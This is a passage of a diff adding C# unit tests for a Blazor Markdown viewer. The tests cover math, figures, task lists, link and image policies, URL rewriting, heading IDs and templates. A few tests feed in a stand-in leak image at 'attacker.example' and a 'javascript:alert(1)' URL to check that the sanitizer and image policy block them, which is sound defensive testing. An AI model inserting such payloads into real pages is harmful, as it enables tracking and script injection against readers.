+        Assert.AreEqual("The fifth one", abbreviations[0].GetAttribute("title"));
+        Assert.AreEqual("Markup", abbreviations[1].GetAttribute("title"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldRenderInlineAndDisplayMath()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseMathematics().Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "Euler: $e^{i\\pi}+1=0$\n\n$$\n\\int_0^1 x^2 dx\n$$");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        var root = component.Find(".bit-mdv");
+        var inline = root.QuerySelector("span.math-inline");
+        var display = root.QuerySelector("div.math-display");
+
+        Assert.IsNotNull(inline);
+        Assert.IsNotNull(display);
+        // The delimiters are re-emitted so KaTeX and MathJax typeset the output as it stands.
+        Assert.AreEqual("$e^{i\\pi}+1=0$", inline.TextContent);
+        Assert.AreEqual("$$\\int_0^1 x^2 dx$$", display.TextContent);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldKeepMathSafeFromEmphasis()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseMathematics().Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "$a_1 + b_1 * c$");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        var html = component.Find(".bit-mdv").InnerHtml;
+
+        // Without the flavor the underscores would be eaten by emphasis and the TeX would break.
+        Assert.DoesNotContain("<em>", html);
+        Assert.Contains("a_1 + b_1 * c", component.Find(".bit-mdv").TextContent);
+    }
+
+    [TestMethod]
+    [DataRow("this costs $5 and that $10.")]
+    [DataRow("a $ b $ c")]
+    public void BitMarkdownViewerShouldNotReadPricesAsMath(string markdown)
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseMathematics().Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, markdown);
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        Assert.AreEqual(0, component.FindAll(".bit-mdv .math").Count);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldNotReadMathWithoutTheExtension()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "$a+b$");
+            parameters.Add(p => p.Pipeline, BitMarkdownPipelines.Advanced);
+        });
+
+        Assert.AreEqual(0, component.FindAll(".bit-mdv .math").Count);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldCaptionATitledImageAsAFigure()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseFigures().Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "![a cat](/cat.png \"A cat, mid-jump\")");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        var figure = component.Find(".bit-mdv figure");
+
+        Assert.AreEqual("A cat, mid-jump", figure.QuerySelector("figcaption")!.TextContent);
+        // The alt stays the alt: a caption everyone reads must not repeat what the alt says.
+        Assert.AreEqual("a cat", figure.QuerySelector("img")!.GetAttribute("alt"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldLeaveAnUntitledImageAlone()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseFigures().Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "![a cat](/cat.png)\n\ntext ![b](/b.png \"t\") in a sentence");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        // Neither an untitled image nor one sitting inside a sentence becomes a figure.
+        Assert.AreEqual(0, component.FindAll(".bit-mdv figure").Count);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldApplyTheImagePolicyInsideFigures()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseFigures().Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "![x](https://attacker.example/leak.png \"caption\")");
+            parameters.Add(p => p.Pipeline, pipeline);
+            parameters.Add(p => p.ImageRendering, BitMarkdownViewerImageRendering.SameOrigin);
+        });
+
+        var image = component.Find(".bit-mdv figure img");
+
+        // A caption must not be a way around the policy: the figure holds the image as an ordinary
+        // child, so the same walk reaches it.
+        Assert.IsNull(image.GetAttribute("src"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerAdvancedPipelineShouldCarryTheRoundTwoFlavors()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown,
+                "*[AST]: Abstract Syntax Tree\n\n:::tip Hi\nAn AST.\n:::\n\nTerm\n: def\n\n![i](/i.png \"cap\")");
+            parameters.Add(p => p.Pipeline, BitMarkdownPipelines.Advanced);
+        });
+
+        var root = component.Find(".bit-mdv");
+
+        Assert.IsNotNull(root.QuerySelector(".markdown-container-tip"));
+        Assert.IsNotNull(root.QuerySelector("abbr"));
+        Assert.IsNotNull(root.QuerySelector("dl"));
+        Assert.IsNotNull(root.QuerySelector("figure"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldKeepTaskCheckboxesDisabledWithoutAHandler()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "- [ ] one");
+            parameters.Add(p => p.Pipeline, BitMarkdownPipelines.GitHub);
+        });
+
+        var checkbox = component.Find(".bit-mdv input[type=checkbox]");
+
+        Assert.IsTrue(checkbox.HasAttribute("disabled"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldEnableTaskCheckboxesWhenAHandlerIsSet()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "- [ ] one");
+            parameters.Add(p => p.Pipeline, BitMarkdownPipelines.GitHub);
+            parameters.Add(p => p.OnTaskChanged, _ => { });
+        });
+
+        var checkbox = component.Find(".bit-mdv input[type=checkbox]");
+
+        Assert.IsFalse(checkbox.HasAttribute("disabled"));
+        Assert.AreEqual("Task 1", checkbox.GetAttribute("aria-label"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldReportTheRewrittenSourceWhenATaskIsTicked()
+    {
+        BitMarkdownViewerTaskChangedEventArgs? reported = null;
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "- [x] one\n- [ ] two\n- [ ] three");
+            parameters.Add(p => p.Pipeline, BitMarkdownPipelines.GitHub);
+            parameters.Add(p => p.OnTaskChanged, args => reported = args);
+        });
+
+        component.FindAll(".bit-mdv input[type=checkbox]")[1].Change(true);
+
+        Assert.IsNotNull(reported);
+        Assert.AreEqual(1, reported.Value.Index);
+        Assert.IsTrue(reported.Value.Checked);
+        Assert.AreEqual("- [x] one\n- [x] two\n- [ ] three", reported.Value.Markdown);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldNumberNestedTaskCheckboxesInReadingOrder()
+    {
+        BitMarkdownViewerTaskChangedEventArgs? reported = null;
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "- [ ] one\n    - [ ] nested\n- [ ] two");
+            parameters.Add(p => p.Pipeline, BitMarkdownPipelines.GitHub);
+            parameters.Add(p => p.OnTaskChanged, args => reported = args);
+        });
+
+        component.FindAll(".bit-mdv input[type=checkbox]")[2].Change(true);
+
+        Assert.IsNotNull(reported);
+        Assert.AreEqual(2, reported.Value.Index);
+        Assert.AreEqual("- [ ] one\n    - [ ] nested\n- [x] two", reported.Value.Markdown);
+    }
+
+    [TestMethod]
+    public void BitMarkdownTaskListShouldSkipMarkersInsideCodeBlocks()
+    {
+        // The document that documents the syntax must still count the boxes the renderer drew.
+        const string markdown = "```\n- [ ] not a task\n```\n\n- [ ] a real one";
+
+        Assert.AreEqual(1, BitMarkdownTaskList.Count(markdown));
+        Assert.AreEqual("```\n- [ ] not a task\n```\n\n- [x] a real one",
+            BitMarkdownTaskList.Toggle(markdown, 0, true));
+    }
+
+    [TestMethod]
+    public void BitMarkdownTaskListShouldLeaveTheSourceAloneWhenThereIsNoSuchMarker()
+    {
+        Assert.AreEqual("- [ ] one", BitMarkdownTaskList.Toggle("- [ ] one", 5, true));
+        Assert.AreEqual("- [ ] one", BitMarkdownTaskList.Toggle("- [ ] one", -1, true));
+        Assert.AreEqual(string.Empty, BitMarkdownTaskList.Toggle(null, 0, true));
+    }
+
+    [TestMethod]
+    public void BitMarkdownTaskListShouldUntickAMarkerAndKeepOrderedMarkersIntact()
+    {
+        Assert.AreEqual("1. [ ] one", BitMarkdownTaskList.Toggle("1. [x] one", 0, false));
+        Assert.AreEqual("  * [x] one", BitMarkdownTaskList.Toggle("  * [ ] one", 0, true));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldApplyTheConfiguredLinkPolicy()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder()
+            .UseLinkOptions(externalTarget: BitMarkdownLinkTarget.Self,
+                            externalRel: "noopener noreferrer nofollow ugc")
+            .Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "[out](https://example.com) and [in](/here)");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        var links = component.FindAll(".bit-mdv a");
+
+        Assert.IsFalse(links[0].HasAttribute("target"));
+        Assert.AreEqual("noopener noreferrer nofollow ugc", links[0].GetAttribute("rel"));
+        Assert.IsFalse(links[1].HasAttribute("target"));
+        Assert.IsFalse(links[1].HasAttribute("rel"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldOpenExternalLinksInANewTabByDefault()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "[out](https://example.com)");
+        });
+
+        var link = component.Find(".bit-mdv a");
+
+        Assert.AreEqual("_blank", link.GetAttribute("target"));
+        Assert.AreEqual("noopener noreferrer", link.GetAttribute("rel"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldKeepLinkTitlesUnderAConfiguredPolicy()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseLinkOptions(internalRel: "author").Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "[in](/here \"a title\")");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        var link = component.Find(".bit-mdv a");
+
+        Assert.AreEqual("a title", link.GetAttribute("title"));
+        Assert.AreEqual("author", link.GetAttribute("rel"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldResolveRelativeUrlsAgainstABaseUrl()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseBaseUrl("https://cdn.example.com/docs/").Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "![i](img/a.png)\n\n[rel](./page.md) [abs](https://x.example) [frag](#top)");
+            parameters.Add(p => p.Pipeline, pipeline);
+            parameters.Add(p => p.ImageRendering, BitMarkdownViewerImageRendering.All);
+        });
+
+        var root = component.Find(".bit-mdv");
+        var links = root.QuerySelectorAll("a");
+
+        Assert.AreEqual("https://cdn.example.com/docs/img/a.png", root.QuerySelector("img")!.GetAttribute("src"));
+        Assert.AreEqual("https://cdn.example.com/docs/page.md", links[0].GetAttribute("href"));
+        // An absolute destination and an in-page fragment are left exactly as written.
+        Assert.AreEqual("https://x.example", links[1].GetAttribute("href"));
+        Assert.AreEqual("#top", links[2].GetAttribute("href"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldResolveRelativeUrlsAgainstASiteRelativeBase()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseBaseUrl("/images/").Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "![i](a.png)");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        Assert.AreEqual("/images/a.png", component.Find(".bit-mdv img").GetAttribute("src"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldSanitizeWhateverAUrlRewriterReturns()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder()
+            .UseUrlRewriter(_ => "javascript:alert(1)")
+            .Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "[x](/safe)");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        // A rewriter must not be a way around the sanitizer.
+        Assert.IsFalse(component.Find(".bit-mdv a").HasAttribute("href"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldDropADestinationARewriterRefuses()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder()
+            .UseUrlRewriter(context => context.IsImage ? null : context.Url)
+            .Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "![alt](/a.png) and [link](/b)");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        var root = component.Find(".bit-mdv");
+
+        Assert.IsFalse(root.QuerySelector("img")!.HasAttribute("src"));
+        Assert.AreEqual("alt", root.QuerySelector("img")!.GetAttribute("alt"));
+        Assert.AreEqual("/b", root.QuerySelector("a")!.GetAttribute("href"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldRewriteAutolinkedUrlsToo()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder()
+            .UseAutoLinks()
+            .UseUrlRewriter(context => context.Url + "?utm=none")
+            .Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "see https://example.com");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        // The rewriter runs last, so the links every flavor creates go through it as well.
+        Assert.AreEqual("https://example.com?utm=none", component.Find(".bit-mdv a").GetAttribute("href"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldHonourAnExplicitHeadingId()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseAutoIdentifiers().Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "## Installing the package {#install}");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        var heading = component.Find(".bit-mdv h2");
+
+        Assert.AreEqual("install", heading.GetAttribute("id"));
+        // The marker names the heading; it is not part of what the heading says.
+        Assert.AreEqual("Installing the package", heading.TextContent);
+    }
+
+    [TestMethod]
+    [DataRow("## A {#id with space}")]
+    [DataRow("## A {not-an-id}")]
+    [DataRow("## A {#}")]
+    public void BitMarkdownViewerShouldLeaveSomethingThatIsNotAnIdMarkerAlone(string markdown)
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseAutoIdentifiers().Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, markdown);
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        Assert.Contains("{", component.Find(".bit-mdv h2").TextContent);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldGiveAnExplicitlyIdentifiedHeadingItsPermalinkToo()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseAutoIdentifiers(anchorLinks: true).Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "## Install {#install}");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        var anchor = component.Find(".bit-mdv h2 a.bit-mdv-anchor");
+
+        Assert.AreEqual("#install", anchor.GetAttribute("href"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldNotLetAnExplicitIdCollideWithASlug()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseAutoIdentifiers().Build();
+
+        var document = pipeline.Parse("# Install {#install}\n\n# Install\n");
+
+        var headings = BitMarkdownAstHelper.Descendants(document).OfType<BitMarkdownHeadingNode>().ToList();
+
+        Assert.AreEqual("install", headings[0].Id);
+        Assert.AreEqual("install-1", headings[1].Id);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldCloseALongerOuterContainerFenceInTheRightOrder()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseContainers().Build();
+
+        var document = pipeline.Parse("::::note\nouter\n\n:::tip\ninner\n:::\n\nstill outer\n::::");
+
+        var outer = document.Children.Single() as BitMarkdownContainerNode;
+
+        Assert.IsNotNull(outer);
+        Assert.AreEqual("note", outer.Name);
+        Assert.AreEqual(1, outer.Children.OfType<BitMarkdownContainerNode>().Count());
+        Assert.AreEqual(2, outer.Children.OfType<BitMarkdownParagraphNode>().Count());
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldNotSplitAnAutolinkedUrlAroundAnAbbreviation()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseAutoLinks().UseAbbreviations().Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "*[HTML]: HyperText Markup Language\n\nhttps://example.com/HTML/spec");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        // Abbreviations run after autolink literals, so the whole URL is still one link.
+        Assert.AreEqual("https://example.com/HTML/spec", component.Find(".bit-mdv a").GetAttribute("href"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownAstHelperShouldRenderADocumentAsPlainText()
+    {
+        var document = BitMarkdownPipelines.GitHub.Parse(
+            "# Title\n\nSome **bold** text with a [link](https://e.com) and `code`.\n\n- one\n- two\n");
+
+        var text = BitMarkdownAstHelper.ToPlainText(document);
+
+        // What the document says, with none of the markup it says it with - and no destinations.
+        Assert.Contains("Title", text);
+        Assert.Contains("Some bold text with a link and code.", text);
+        Assert.Contains("one", text);
+        Assert.DoesNotContain("https://e.com", text);
+        Assert.DoesNotContain("**", text);
+    }
+
+    [TestMethod]
+    public void BitMarkdownAstHelperShouldSeparateBlocksInPlainText()
+    {
+        var document = BitMarkdownPipelines.Basic.Parse("one\n\ntwo");
+
+        Assert.AreEqual("one\n\ntwo", BitMarkdownAstHelper.ToPlainText(document));
+    }
+
+    [TestMethod]
+    public void BitMarkdownAstHelperShouldReadImageAltTextIntoPlainText()
+    {
+        var document = BitMarkdownPipelines.Basic.Parse("![a cat](/cat.png)");
+
+        Assert.AreEqual("a cat", BitMarkdownAstHelper.ToPlainText(document));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldRenderCodeBlocksThroughTheTemplate()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "```csharp\nvar x = 1;\n```");
+            parameters.Add(p => p.CodeBlockTemplate, code => builder =>
+            {
+                builder.OpenElement(0, "div");
+                builder.AddAttribute(1, "class", "custom-code");
+                builder.AddAttribute(2, "data-language", code.Info);
+                builder.AddContent(3, code.Content);
+                builder.CloseElement();
+            });
+        });
+
+        var root = component.Find(".bit-mdv");
+        var custom = root.QuerySelector(".custom-code");
+
+        Assert.IsNotNull(custom);
+        Assert.AreEqual("csharp", custom.GetAttribute("data-language"));
+        Assert.AreEqual("var x = 1;", custom.TextContent);
+        // The template replaces the default markup rather than adding to it.
+        Assert.IsNull(root.QuerySelector("pre"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldRenderImagesThroughTheTemplate()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "![a cat](/cat.png)");
+            parameters.Add(p => p.ImageTemplate, image => builder =>
+            {
+                builder.OpenElement(0, "figure");
+                builder.AddAttribute(1, "data-src", image.Url);
+                builder.AddContent(2, image.Alt);
+                builder.CloseElement();
+            });
+        });
+
+        var figure = component.Find(".bit-mdv figure");
+
+        Assert.AreEqual("/cat.png", figure.GetAttribute("data-src"));
+        Assert.AreEqual("a cat", figure.TextContent);
+        Assert.AreEqual(0, component.FindAll(".bit-mdv img").Count);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldRenderLinksThroughTheTemplate()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "[bit](https://bitplatform.dev)");
+            parameters.Add(p => p.LinkTemplate, link => builder =>
+            {
+                builder.OpenElement(0, "button");
+                builder.AddAttribute(1, "data-href", link.Url);
+                builder.AddContent(2, BitMarkdownInlineHelpers.PlainText(link.Children));
+                builder.CloseElement();
+            });
+        });
+
+        var button = component.Find(".bit-mdv button");
+
+        Assert.AreEqual("https://bitplatform.dev", button.GetAttribute("data-href"));
+        Assert.AreEqual("bit", button.TextContent);
+        Assert.AreEqual(0, component.FindAll(".bit-mdv a").Count);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldApplyTheImagePolicyBeforeTheImageTemplateRuns()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "![x](https://attacker.example/leak.png)");
+            parameters.Add(p => p.ImageRendering, BitMarkdownViewerImageRendering.SameOrigin);
+            parameters.Add(p => p.ImageTemplate, image => builder =>
+            {
+                builder.OpenElement(0, "span");
+                builder.AddAttribute(1, "data-src", image.Url);
+                builder.CloseElement();
+            });
+        });
+
+        // A template is not a way around the policy: the blocked image arrives with no source.
+        Assert.AreEqual(string.Empty, component.Find(".bit-mdv span").GetAttribute("data-src"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldUseTheDefaultRenderingForNodeTypesWithNoTemplate()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "[a](/x)\n\n```\ncode\n```");
+            parameters.Add(p => p.LinkTemplate, link => builder => builder.AddContent(0, "LINK"));
+        });
+
+        var root = component.Find(".bit-mdv");
+
+        Assert.Contains("LINK", root.TextContent);
+        // Only links were templated, so the code block is still the viewer's own markup.
+        Assert.IsNotNull(root.QuerySelector("pre code"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldPickUpATemplateSuppliedOnALaterRender()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "[a](/x)");
+        });
+
+        Assert.IsNotNull(component.Find(".bit-mdv a"));
+
+        component.Render(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "[a](/x)");
+            parameters.Add(p => p.LinkTemplate, link => builder => builder.AddContent(0, "LINK"));
+        });
+
+        Assert.AreEqual(0, component.FindAll(".bit-mdv a").Count);
+        Assert.Contains("LINK", component.Find(".bit-mdv").TextContent);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldPutTheLanguageClassOnBothCodeElements()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "```csharp\nvar x = 1;\n```");
+        });
+
+        var root = component.Find(".bit-mdv");
+
+        // A highlighter reads the class off the <code>; several of their plugins read it off
+        // the <pre>.
+        Assert.AreEqual("language-csharp", root.QuerySelector("pre")!.GetAttribute("class"));
+        Assert.AreEqual("language-csharp", root.QuerySelector("pre code")!.GetAttribute("class"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldLeaveAnUnlabelledCodeBlockUnclassed()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "```\nvar x = 1;\n```");
+        });
+
+        Assert.IsNull(component.Find(".bit-mdv pre").GetAttribute("class"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldCloseAQuoteThatEmphasisSplitAcrossTextNodes()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseSmartyPants().Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "\"**bold**\" and \"plain\"");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        // The closing quote is a text node of its own; reading it in isolation would open a
+        // second quote instead of closing the first.
+        Assert.AreEqual("“bold” and “plain”", component.Find(".bit-mdv p").TextContent);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldStartQuotingAfreshInEachBlock()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseSmartyPants().Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "ends in a word\n\n\"a new block\"");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        var paragraphs = component.FindAll(".bit-mdv p");
+
+        Assert.AreEqual("“a new block”", paragraphs[1].TextContent);
+    }
+
+    [TestMethod]
+    public void BitMarkdownAstHelperShouldReadMathAndAbbreviationsIntoPlainText()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseMathematics().UseAbbreviations().Build();
+
+        var document = pipeline.Parse("*[AST]: Abstract Syntax Tree\n\nThe AST holds $e^{i\\pi}$.");
+
+        var text = BitMarkdownAstHelper.ToPlainText(document);
+
+        // Both flavors carry their text on the node itself rather than in a child text run.
+        Assert.Contains("AST", text);
+        Assert.Contains("e^{i\\pi}", text);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldSlugAHeadingThroughItsMath()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseMathematics().UseAutoIdentifiers().Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "## The $x$ theorem");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        Assert.AreEqual("the-x-theorem", component.Find(".bit-mdv h2").GetAttribute("id"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldLeaveEscapedDollarsOutOfMath()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseMathematics().Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "a \\$5 rebate");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        Assert.AreEqual(0, component.FindAll(".bit-mdv .math").Count);
+        Assert.AreEqual("a $5 rebate", component.Find(".bit-mdv p").TextContent);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldLeaveAnUnterminatedMathRunAsText()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseMathematics().Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "a $x and b");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        Assert.AreEqual(0, component.FindAll(".bit-mdv .math").Count);
+        Assert.AreEqual("a $x and b", component.Find(".bit-mdv p").TextContent);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldExpandAnAbbreviationWithPunctuationInIt()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseAbbreviations().Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "*[C++]: A language\n\nI know C++ well.");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        // Terms are matched as text, not as a pattern, so one made of punctuation still works.
+        Assert.AreEqual("C++", component.Find(".bit-mdv abbr").TextContent);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldReadContainersAndDefinitionListsInsideOtherBlocks()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseContainers().UseDefinitionLists().Build();
+
+        var quoted = pipeline.Parse("> :::note\n> x\n> :::");
+        var listed = pipeline.Parse("- Term\n  : def");
+
+        Assert.AreEqual(1, BitMarkdownAstHelper.Descendants(quoted).OfType<BitMarkdownContainerNode>().Count());
+        Assert.AreEqual(1, BitMarkdownAstHelper.Descendants(listed).OfType<BitMarkdownDefinitionListNode>().Count());
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldReadFrontMatterFromACrlfDocument()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseFrontMatter().Build();
+
+        var frontMatter = BitMarkdownFrontMatterNode.Find(pipeline.Parse("---\r\na: 1\r\n---\r\n\r\nbody"));
+
+        Assert.IsNotNull(frontMatter);
+        Assert.AreEqual("a: 1", frontMatter.Text);
+    }
+
+    [TestMethod]
+    public void BitMarkdownTaskListShouldKeepCrlfLineEndings()
+    {
+        Assert.AreEqual("- [ ] a\r\n- [x] b", BitMarkdownTaskList.Toggle("- [ ] a\r\n- [ ] b", 1, true));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldWriteItsOwnWordsFromTheConfiguredTexts()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder()
+            .UseGitHubFlavored()
+            .UseAutoIdentifiers(anchorLinks: true)
+            .UseTexts(new BitMarkdownTexts
+            {
+                AlertWarning = "Achtung",
+                Footnotes = "Fußnoten",
+                FootnoteBackReference = "Zurück zu {0}",
+                Table = "Tabelle",
+                PermalinkTo = "Link zu {0}",
+            })
+            .Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown,
+                "# Titel\n\n> [!WARNING]\n> x\n\n| a |\n|---|\n| 1 |\n\ny[^1]\n\n[^1]: z");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        var root = component.Find(".bit-mdv");
+
+        Assert.AreEqual("Achtung", root.QuerySelector(".markdown-alert-title")!.TextContent);
+        Assert.AreEqual("Tabelle", root.QuerySelector(".bit-mdv-table-wrapper")!.GetAttribute("aria-label"));
+        Assert.AreEqual("Fußnoten", root.QuerySelector("section.footnotes")!.GetAttribute("aria-label"));
+        Assert.AreEqual("Zurück zu 1", root.QuerySelector(".footnote-backref")!.GetAttribute("aria-label"));
